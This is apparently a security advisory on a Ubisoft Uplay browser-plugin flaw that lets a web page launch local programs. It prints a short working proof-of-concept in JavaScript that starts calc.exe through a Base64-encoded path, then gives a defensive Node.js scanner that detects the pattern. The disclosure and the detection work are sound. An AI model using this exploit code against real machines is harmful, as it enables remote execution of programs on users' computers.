A critical vulnerability in the Ubisoft Uplay web-browser plugin, which is installed by all current Ubisoft games (Assassin's Creed II, Assassin's Creed: Brotherhood, Assassin's Creed: Project Legacy, Assassin's Creed Revelations, Assassin's Creed III, Beowulf: The Game, Brothers In Arms: Furious 4, Call Of Juarez: The Cartel, Driver: San Francisco, Heroes Of Might And Magic VI, Just Dance 3, Prince Of Persia: The Forgotten Sands, Pure Football, R.U.S.E., Shaun White Skateboarding, Silent Hunter 5: Battle Of The Atlantic, The Settlers 7: Paths To A Kingdom, Tom Clancy's H.A.W.X. 2, Tom Clancy's Ghost Recon: Future Soldier and Tom Clancy's Splinter Cell: Conviction), is now public. It allows a hacker to remotely launch and install programs on a user's computer.
All a hacker needs to do is get a user to click a link and use these simple lines of code to attack. If you have a Ubisoft game installed, a proof of concept is available at http://pastehtml.com/view/c6gxl1a79.html (it launches the calculator executable).
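// Create an OBJECT element that the browser hands to the Uplay plugin via its MIME type
var x = document.createElement('OBJECT');
x.setAttribute("type", "application/x-uplaypc");
document.body.appendChild(x);
// -orbit_exe_path takes a Base64-encoded path; this value decodes to C:\WINDOWS\SYSTEM32\CALC.EXE
x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play");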
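For defenders, a static check of page source for this pattern can be written as below. This is an added example, not part of the original article or of Ubisoft's code; it runs under Node.js, the function names are hypothetical, and the sample page is constructed from the proof of concept above.

```javascript
// Added example: triage HTML/JS source for Uplay plugin launch attempts.
// Names below are hypothetical; SAMPLE_PAGE is constructed from the PoC.
const UPLAY_MIME = /application\/x-uplaypc/i;
// Value following -orbit_exe_path; the PoC passes it Base64-encoded.
const EXE_PATH_ARG = /-orbit_exe_path\s+([A-Za-z0-9+\/]+={0,2})/g;
const FLAG = /-(?:orbit|uplay)_[a-z_]+/g;

// Buffer.from() silently skips invalid Base64, so verify by re-encoding.
function decodeBase64Strict(token) {
  const buf = Buffer.from(token, 'base64');
  const strip = (s) => s.replace(/=+$/, '');
  if (buf.length === 0 || strip(buf.toString('base64')) !== strip(token)) {
    return null;
  }
  return buf.toString('latin1');
}

function scanForUplayLaunch(source) {
  const referencesPlugin = UPLAY_MIME.test(source);
  const findings = [];
  for (const m of source.matchAll(EXE_PATH_ARG)) {
    findings.push({
      offset: m.index,
      encoded: m[1],
      decodedPath: decodeBase64Strict(m[1]), // null if not valid Base64
    });
  }
  // Distinct plugin command-line flags seen anywhere in the source.
  const flags = [...new Set(source.match(FLAG) || [])];
  return {
    referencesPlugin,
    findings,
    flags,
    // Plugin MIME type plus an executable-path argument is the PoC shape.
    suspicious: referencesPlugin && findings.length > 0,
  };
}

const SAMPLE_PAGE = [
  "var x = document.createElement('OBJECT');",
  'x.setAttribute("type", "application/x-uplaypc");',
  'document.body.appendChild(x);',
  'x.open("-orbit_product_id 1 -orbit_exe_path ' +
    'QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode ' +
    '-uplay_dev_mode -uplay_dev_mode_auto_play");',
].join('\n');

const report = scanForUplayLaunch(SAMPLE_PAGE);
console.log(JSON.stringify(report, null, 2));
```

The check only sees literal strings, so source that assembles the MIME type or the argument string at run time will not be flagged.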